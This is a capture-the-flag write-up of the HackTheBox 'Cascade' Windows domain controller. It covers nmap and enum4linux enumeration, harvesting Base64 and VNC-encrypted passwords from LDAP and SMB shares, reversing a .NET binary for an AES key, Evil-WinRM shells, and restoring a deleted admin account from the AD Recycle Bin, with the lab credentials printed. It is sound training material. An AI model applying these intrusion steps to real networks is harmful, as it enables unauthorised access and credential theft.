HackTheBox Cascade (10.10.10.182) is a recent Windows box by VbScrub. Like previous Windows machines, a bunch of very well-known tools can exploit the Cascade until you get the User. Once you get the user the methodology changes completely. This is the first time I used SQLite database in HTB in a windows box. The initial foothold could be a bit tricky, but worth the efforts!. If you are into Windows business, then it is like reviewing your expertise and for Linux guys it is a great learn to hack Windows AD infra.
The Cascade box is all about Enumeration, Getting right users from AD, finding their password, decrypting, reading the directories from SMB, reading registry, finding the way to decrypt another password using the right tools. The RE is something I always hate, but to find your way in its mandatory to RE the binary file and get the Keys to unlock the main door.
So, lets get started.
Like every other machines I add the machine IP 10.10.10.182 to my hots file as cascade.htb and fired up my terminal and proceed to NMAP scan.
# root @ ns09 in ~/htb/cascade [19:34:46] $ nmap -sV -p- -oA cascade.nmap cascade.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 19:59 +03 Nmap scan report for cascade.htb (10.10.10.182) Host is up (0.14s latency). Not shown: 65520 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-30 17:08:38Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 580.49 seconds # root @ ns09 in ~/htb/cascade [20:08:56]
OK, here we have commonly known Windows AD, Windows Kerberos, SMB ports are wide open. I’m not interested in all the open holes, I decided to run Enum4Linux a great Windows enumeration tool available in Kali Linux.
Initially I run the full Enum4Linux, but I was overwhelmed by the information being returned by the machine, so I run the tool again to get the available users.
We have total 15 users in the box.
user:[CascGuest] rid:[0x1f5] user:[arksvc] rid:[0x452] user:[s.smith] rid:[0x453] user:[r.thompson] rid:[0x455] user:[util] rid:[0x457] user:[j.wakefield] rid:[0x45c] user:[s.hickson] rid:[0x461] user:[j.goodhand] rid:[0x462] user:[a.turnbull] rid:[0x464] user:[e.crowe] rid:[0x467] user:[b.hanson] rid:[0x468] user:[d.burman] rid:[0x469] user:[BackupSvc] rid:[0x46a] user:[j.allen] rid:[0x46e] user:[i.croft] rid:[0x46f]
In the next step, I used Impacket LDAPSerach tool to gather as much as information from the Cascade AD. As you may already know LDAPSerach return a huge amount of data, so it is always a best-practice to export the results into an external file.
So, here is what I was looking for I have the credential for the user R.Thompson.
However, the password is encoded in Base64, a simple decoding from Kali exposes the real password.
The exposed credentials: firstname.lastname@example.org:rY4n5eva
In the next step, I tried to open SMB using the user R.Thompson and I did the right thing.
I took a while and proceeded to enumerate the directories one by one. Since IT was the low hanging fruit, I started with IT directory.
This email says, that they had a TempAdmin user which was created and has the same login credentials as the System Administrator. It means, I will have to find the password of TempAdmin in order to have System Administrator password.
A piece of Log from ArkAdRecycleBin. This log shows a service account user ArkSvc deleting two users “test” and “TempAdmin” – Well, that’s interesting, the email and this log has something to do in the later steps.
# root @ ns09 in ~/htb/cascade [21:22:30] $ cat ArkAdRecycleBin.log 1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 1/10/2018 15:43 [MAIN_THREAD] Validating settings... 1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied 1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5 2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 2/10/2018 15:56 [MAIN_THREAD] Validating settings... 2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc 2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0 8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 8/12/2018 12:22 [MAIN_THREAD] Validating settings... 8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc 8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0 # root @ ns09 in ~/htb/cascade [21:22:35]
There is another log file under DCs “dcdiag.log” that shows the logs of testing the connectivity between another domain controller “CASC-DC1”.
After a while, I found a registry entry in the user directory in \IT\Temp\s.smith\VNC Install.reg. I downloaded it and cat it to find password in a hex value.
I tried to decode using online HEX decoders but it didn’t take long for me to understand the hex is not regular windows hex but VNC Encrypted Password. I found this tool online that claims to decoded VNC encryptions.
And the password was successfully decrypted:
Getting The Shell Using Evil-WinRM and Getting The User.txt
So the next step is straightforward. I used the Evil-WinRM to get PowerShell shell on the box.
From the User S.Smith I run the whoami /all and noticed the new share: “Audit“
I used the SMBClient to list the share and here is what it looked like:
# root @ ns09 in ~/htb/cascade [22:06:13] $ smbclient //cascade.htb/Audit$ -U s.smith Enter WORKGROUP\s.smith's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jan 29 21:01:26 2020 .. D 0 Wed Jan 29 21:01:26 2020 CascAudit.exe A 13312 Wed Jan 29 00:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 21:00:20 2020 DB D 0 Wed Jan 29 00:40:59 2020 RunAudit.bat A 45 Wed Jan 29 02:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 09:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 09:38:38 2019 x64 D 0 Mon Jan 27 01:25:27 2020 x86 D 0 Mon Jan 27 01:25:27 2020 13106687 blocks of size 4096. 7793827 blocks available smb: \>
The newly found directory contains an exe file, some x64, x86 dlls, a windows bat file, SQLite database and SQLite DLL files.
I download everything from the share to my Kali and then transferred it to my Windows Host machine.
I opened the database Audit.db using EditPlus (the first tool I love to use before I use anything ) and surprisingly I saw an encrypted password of the user “ArkSvc“.
Reverse Engineering Using dnSpy
As per the forum and VBScrub, the process as well involved RE the bin file “CascAudit.exe”. I opened the file using my favourite dnSpy. After going through the disassembler I found a decrypt key in the MainModule.
Going further, I opened the CascCrypty.dll and noticed the Encryption used was AES and inside the Crypto class, found the Decrypting key and the concrete proof that the encryption was AES 128. Now its clear that ArkSvc password is encrypted with AES128, I’m going to find some tools to decrypt.
There are a lot of AES128 decrypted online, I used this.
And we have the password.
Getting The Shell As ArcSvc Using Evil-WinRM
# root @ ns09 in ~/htb/cascade [10:46:16] $ ruby evil-winrm.rb -i cascade.htb -u ArkSvc -p w3lc0meFr31nd Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all USER INFORMATION ---------------- User Name SID ============== ============================================== cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\arksvc\Documents>
The privilege shows the user ArkSvc has access to a share AD Recycle Bin.
Straight To The Root
Its pretty straightforward in PowerShell to pull objects from AD Recycle Bin. Running the PowerShell script I found objects in the AD recycle Bin. Where I found deleted TempAdmin user. This was mentioned in the mail document found in the R. Thompson’s directory. The user TempAdmin has the same password as System Administrator.
The password was Base64 encrypted, I decrypted it from my Kali terminal.
# root @ ns09 in ~/htb/cascade [11:30:44] $ echo YmFDVDNyMWFOMDBkbGVz | base64 -d baCT3r1aN00dles# # root @ ns09 in ~/htb/cascade [11:31:02]
I used the Evil-WinRM 4th time and here I owned the Cacade
Thank you for reading. It was a great machine, I learned a lot. There were a couple of hiccups but I managed to find the way myself.